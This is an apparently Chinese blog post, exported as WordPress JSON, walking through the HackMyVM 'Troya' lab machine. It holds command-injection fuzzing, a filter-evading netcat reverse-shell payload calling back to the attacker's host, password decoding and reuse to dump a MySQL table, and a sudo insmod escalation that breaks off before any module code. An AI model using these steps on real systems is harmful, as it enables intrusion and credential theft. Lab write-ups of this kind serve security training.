{"id":925,"date":"2025-06-28T02:37:35","date_gmt":"2025-06-27T18:37:35","guid":{"rendered":"http:\/\/162.14.82.114\/?p=925"},"modified":"2025-06-28T02:37:35","modified_gmt":"2025-06-27T18:37:35","slug":"hmv-_-troya","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/925\/06\/28\/2025\/","title":{"rendered":"hmv [-_-] Troya"},"content":{"rendered":"

Troya<\/h1>\n

\"image-20250626073336827\"<\/div>
\n
\"image-20250627223609101\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Troya]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 b0:b8:5e:2c:41:b8:7c:c8:20:e8:09:ff:7a:6f:ff:9f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGzDvMiSzAKx8LgRHQSGCjYQnRMIvZ3UuVvF2HOjumUrcKqsmhoqrt+r2xW6LWnViU5vLLQJrpwaoBCZPAAamZSQRttehcSjJE9JcBLg2wYC2oiMCBQ1k+QL\/Iknc+eTPRVNUDKFMaOUpdbPSX2glm+m6TpA52MRS1OFqZkFsuvwM3D3iRfpB5FecYSe6ihuUaUm\/O5z72rJIOsStfkM6Qe8NqnDF0DfD7vSCEiFenNJZT8djSFMQO+Bg8dXwlp6aCb8G9VWQwyjrgxTcDMv20nWvocQcRy2fNO8qC1WPRBZhVl\/LjGC9eBjmH1bRHZ3ydcdZChbOa3KrdVkSxpfbF\n|   256 3f:44:9f:25:14:99:40:17:e0:07:1f:2e:67:de:78:18 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEbFsO3VVPjlgJmE+s21fQoDV+WrOZALhTfD04WHrfn9cqqR3oLdkHW9DswbrxAS7fmvVN2t9IgXmcaJhXyXJtI=\n|   256 c4:0e:93:55:b2:7b:8c:86:c3:e4:6d:01:93:60:d2:b1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOGTvnYiwMPSizNaaMbsjAbUAtRzcmAf71bfuB6mg++I\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n|_http-title: Site doesn't have a title (text\/html; charset=UTF-8).\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST\nMAC Address: 08:00:27:DA:71:C5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Troya]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php            \n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.10.106\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 All Status Codes!\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [html, txt, php]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET       11l       15w      153c http:\/\/192.168.10.106\/index.php\n200      GET       11l       15w      153c http:\/\/192.168.10.106\/<\/code><\/pre>\n
\u626b\u4e86\u4e00\u534a\u5565\u90fd\u6ca1\u6709\uff0c\u4e0d\u626b\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Troya]\n\u2514\u2500$ whatweb http:\/\/$IP\nhttp:\/\/192.168.10.106 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx\/1.14.2], IP[192.168.10.106], nginx[1.14.2]<\/code><\/pre>\n
\"image-20250627223751195\"<\/div><\/p>\n
<html>\n<body>\n<form method="post" action="\/index.php">\n  Enter ip: <input type="text" name="command">\n  <input type="submit">\n<\/form>\n<\/body>\n<\/html><\/code><\/pre>\n
\u6d4b\u8bd5\u8f93\u5165\u6846<\/h3>\n
\u8f93\u5165127.0.0.1<\/code>\uff1a<\/p>\n
\"image-20250627223838676\"<\/div><\/p>\n
\u5c1d\u8bd5\u4f7f\u7528&|;'<><\/code>\u7b49\u7b26\u53f7\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\"image-20250627223943917\"<\/div><\/p>\n
\u770b\u6765\u5b58\u5728\u90e8\u5206\u8fc7\u6ee4\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u5bf9\u5176\u8fdb\u884c\u6a21\u7cca\u6d4b\u8bd5\uff1a<\/p>\n
\"image-20250627224656596\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Troya]\n\u2514\u2500$ ffuf -u http:\/\/$IP\/index.php -c -w \/usr\/share\/seclists\/Fuzzing\/alphanum-case.txt -d 'command=FUZZ' -H 'Content-Type: application\/x-www-form-urlencoded' -fw 16\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : POST\n :: URL              : http:\/\/192.168.10.106\/index.php\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/alphanum-case.txt\n :: Header           : Content-Type: application\/x-www-form-urlencoded\n :: Data             : command=FUZZ\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 16\n________________________________________________\n\nh                       [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 60ms]\ni                       [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 64ms]\ns                       [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 72ms]\na                       [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 151ms]\n:: Progress: [62\/62] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 0 ::<\/code><\/pre>\n
\u5982\u4e0a\u6d4b\u8bd5\u51fa\u6765\u7684\u5b57\u7b26\u4e0d\u80fd\u5229\u7528\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Troya]\n\u2514\u2500$ ffuf -u http:\/\/$IP\/index.php -c -w \/usr\/share\/seclists\/Fuzzing\/alphanum-case-extra.txt -d 'command=FUZZ' -H 'Content-Type: application\/x-www-form-urlencoded' -fr "No"\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : POST\n :: URL              : http:\/\/192.168.10.106\/index.php\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/alphanum-case-extra.txt\n :: Header           : Content-Type: application\/x-www-form-urlencoded\n :: Data             : command=FUZZ\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Regexp: No\n________________________________________________\n\n+                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 55ms]\n\/                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 79ms]\nH                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 89ms]\n0                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 124ms]\n,                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 137ms]\n!                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 156ms]\n&                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 180ms]\n1                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 192ms]\n.                       [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 219ms]\n3                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 256ms]\n2                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 260ms]\n-                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 283ms]\n4                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 329ms]\n5                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 337ms]\n(                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 344ms]\n)                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 359ms]\n6                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 379ms]\n7                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 407ms]\n8                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 419ms]\n9                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 447ms]\n:                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 461ms]\n$                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 495ms]\n@                       [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 520ms]\nA                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 537ms]\n?                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 546ms]\nB                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 581ms]\nD                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 592ms]\nC                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 625ms]\nE                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 670ms]\nF                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 681ms]\nG                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]\nI                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]\nJ                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 674ms]\nK                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 668ms]\nL                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 698ms]\nM                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 691ms]\nN                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 696ms]\nP                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 758ms]\nQ                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 764ms]\nO                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 785ms]\nR                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 751ms]\nS                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 807ms]\nT                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]\nV                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 784ms]\nU                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 797ms]\nX                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 838ms]\nW                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 847ms]\nZ                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 786ms]\nY                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 836ms]\n\\                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 816ms]\n[                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 870ms]\nb                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 759ms]\n_                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]\n]                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 873ms]\nf                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 839ms]\nc                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 863ms]\ne                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]\nd                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 872ms]\ng                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 887ms]\nk                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 832ms]\nj                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 899ms]\nl                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]\nm                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 860ms]\nn                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 826ms]\no                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 835ms]\np                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 879ms]\nq                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 828ms]\nt                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 780ms]\nr                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 857ms]\nv                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 825ms]\nu                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 850ms]\nx                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 770ms]\nw                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 788ms]\n|                       [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 728ms]\ny                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]\nz                       [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]\n                        [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 658ms]\n:: Progress: [95\/95] :: Job [1\/1] :: 55 req\/sec :: Duration: [0:00:01] :: Errors: 0 ::<\/code><\/pre>\n
\u53ef\u4ee5\u5229\u7528\u7684\u5728\u8fd9\u91cc\u3002\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u53cd\u5f39shell\uff0c\u5b9e\u6218\u53d1\u73b0&<\/code>\u4e5f\u4e0d\u884c\uff1a<\/p>\n
| nc 192.168.10.107 1234 -e \/b?n\/b???<\/code><\/pre>\n
\"image-20250627230048948\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@troya:\/var\/www\/html$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Oct 22  2020 .\ndrwxr-xr-x 3 root root 4096 Oct 22  2020 ..\n-rw-r--r-- 1 root root  518 Oct 22  2020 index.php\n-rw-r--r-- 1 root root   13 Oct 22  2020 secret.pdf\n(remote) www-data@troya:\/var\/www\/html$ cat secret.pdf \ncGF6endvcmQK\n(remote) www-data@troya:\/var\/www\/html$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\npaul\nsshd\nhector\nhelena\n(remote) www-data@troya:\/var\/www\/html$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root   root   4096 Oct 22  2020 .\ndrwxr-xr-x 18 root   root   4096 Oct 22  2020 ..\ndrwxr-xr-x  2 hector hector 4096 Oct 22  2020 hector\ndrwxr-xr-x  3 helena helena 4096 Oct 22  2020 helena\ndrwxr-xr-x  2 paul   paul   4096 Oct 22  2020 paul\n(remote) www-data@troya:\/var\/www\/html$ cd \/home\/hector\/\n(remote) www-data@troya:\/home\/hector$ ls -la\ntotal 20\ndrwxr-xr-x 2 hector hector 4096 Oct 22  2020 .\ndrwxr-xr-x 5 root   root   4096 Oct 22  2020 ..\n-rw-r--r-- 1 hector hector  220 Oct 22  2020 .bash_logout\n-rw-r--r-- 1 hector hector 3526 Oct 22  2020 .bashrc\n-rw-r--r-- 1 hector hector  807 Oct 22  2020 .profile\n(remote) www-data@troya:\/home\/hector$ cd ..\/helena\/\n(remote) www-data@troya:\/home\/helena$ ls -la\ntotal 28\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 .\ndrwxr-xr-x 5 root   root   4096 Oct 22  2020 ..\n-rw-r--r-- 1 helena helena  220 Oct 22  2020 .bash_logout\n-rw-r--r-- 1 helena helena 3526 Oct 22  2020 .bashrc\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 .local\n-rw-r--r-- 1 helena helena  807 Oct 22  2020 .profile\n-rw------- 1 helena helena   11 Oct 22  2020 user.txt\n(remote) www-data@troya:\/home\/helena$ cd .local\/\n(remote) www-data@troya:\/home\/helena\/.local$ ls -la\ntotal 12\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 .\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 ..\ndrwx------ 3 helena helena 4096 Oct 22  2020 share\n(remote) www-data@troya:\/home\/helena\/.local$ cd ..\/..\/paul\/\n(remote) www-data@troya:\/home\/paul$ ls -la\ntotal 24\ndrwxr-xr-x 2 paul paul 4096 Oct 22  2020 .\ndrwxr-xr-x 5 root root 4096 Oct 22  2020 ..\n-rw------- 1 paul paul   51 Oct 22  2020 .Xauthority\n-rw-r--r-- 1 paul paul  220 Oct 22  2020 .bash_logout\n-rw-r--r-- 1 paul paul 3526 Oct 22  2020 .bashrc\n-rw-r--r-- 1 paul paul  807 Oct 22  2020 .profile<\/code><\/pre>\n
\u6570\u636e\u5e93\u6cc4\u9732<\/h3>\n
\u5f97\u5230\u7684\u90a3\u4e2asecret.pdf<\/code>\u80af\u5b9a\u662f\u6709\u7528\u7684\uff0c\u770b\u8d77\u6765\u602a\u602a\u7684\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u662f\u52a0\u5bc6\u4e86\uff1a<\/p>\n
\"image-20250627230703751\"<\/div><\/p>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff0c\u4f46\u662f\u672a\u679c\uff0c\u53d1\u73b0\u5b58\u5728mysql<\/code>\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff0c\u53d1\u73b0hector<\/code>\u4f7f\u7528\u5bc6\u7801pazzword<\/code>\u53ef\u4ee5\u8fde\u63a5\u4e0a\uff01\uff01\uff01\uff01<\/p>\n
(remote) www-data@troya:\/home\/paul$ ss -tnlup\nNetid           State            Recv-Q           Send-Q                      Local Address:Port                       Peer Address:Port                                                     \nudp             UNCONN           0                0                                 0.0.0.0:68                              0.0.0.0:*                                                        \ntcp             LISTEN           0                128                               0.0.0.0:80                              0.0.0.0:*               users:(("nginx",pid=471,fd=6))           \ntcp             LISTEN           0                128                               0.0.0.0:22                              0.0.0.0:*                                                        \ntcp             LISTEN           0                80                              127.0.0.1:3306                            0.0.0.0:*                                                        \ntcp             LISTEN           0                128                                  [::]:80                                 [::]:*               users:(("nginx",pid=471,fd=7))           \ntcp             LISTEN           0                128                                  [::]:22                                 [::]:*                                                    \n\n(remote) www-data@troya:\/var\/www\/html$ mysql -u hector -p\nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 39\nServer version: 10.3.25-MariaDB-0+deb10u1 Debian 10\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| yo                 |\n+--------------------+\n2 rows in set (0.017 sec)\n\nMariaDB [(none)]> use yo;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [yo]> show tables;\n+--------------+\n| Tables_in_yo |\n+--------------+\n| lucky        |\n+--------------+\n1 row in set (0.000 sec)\n\nMariaDB [yo]> select * from lucky;\n+----+--------+--------------------+\n| id | uzer   | pazz               |\n+----+--------+--------------------+\n|  1 | helena | iuyqwejkhdsaiuyewq |\n+----+--------+--------------------+\n1 row in set (0.000 sec)\n\nMariaDB [yo]> exit\nBye<\/code><\/pre>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
\"image-20250627230949023\"<\/div><\/p>\n
insmod\u63d0\u6743root<\/h3>\n
helena@troya:~$ ls -la\ntotal 28\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 .\ndrwxr-xr-x 5 root   root   4096 Oct 22  2020 ..\n-rw-r--r-- 1 helena helena  220 Oct 22  2020 .bash_logout\n-rw-r--r-- 1 helena helena 3526 Oct 22  2020 .bashrc\ndrwxr-xr-x 3 helena helena 4096 Oct 22  2020 .local\n-rw-r--r-- 1 helena helena  807 Oct 22  2020 .profile\n-rw------- 1 helena helena   11 Oct 22  2020 user.txt\nhelena@troya:~$ cat user.txt \npleasestop\nhelena@troya:~$ sudo -l\nMatching Defaults entries for helena on troya:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser helena may run the following commands on troya:\n    (ALL) NOPASSWD: \/usr\/sbin\/insmod<\/code><\/pre>\n
\u5565\u73a9\u610f\u554a\u8fd9\u662f\uff1a<\/p>\n
\n
Linux insmod\uff08\u82f1\u6587\u5168\u62fc\uff1ainstall module\uff09\u547d\u4ee4\u7528\u4e8e\u8f7d\u5165\u6a21\u5757\u3002<\/p>\n
Linux\u6709\u8bb8\u591a\u529f\u80fd\u662f\u901a\u8fc7\u6a21\u5757\u7684\u65b9\u5f0f\uff0c\u5728\u9700\u8981\u65f6\u624d\u8f7d\u5165kernel\u3002\u5982\u6b64\u53ef\u4f7fkernel\u8f83\u4e3a\u7cbe\u7b80\uff0c\u8fdb\u800c\u63d0\u9ad8\u6548\u7387\uff0c\u4ee5\u53ca\u4fdd\u6709\u8f83\u5927\u7684\u5f39\u6027\u3002\u8fd9\u7c7b\u53ef\u8f7d\u5165\u7684\u6a21\u5757\uff0c\u901a\u5e38\u662f\u8bbe\u5907\u9a71\u52a8\u7a0b\u5e8f\u3002<\/p>\n
\u8bed\u6cd5<\/h3>\n
insmod [-fkmpsvxX][-o <\u6a21\u5757\u540d\u79f0>][\u6a21\u5757\u6587\u4ef6][\u7b26\u53f7\u540d\u79f0 = \u7b26\u53f7\u503c]<\/code><\/pre>\n
\u53c2\u6570\u8bf4\u660e<\/strong>\uff1a<\/p>\n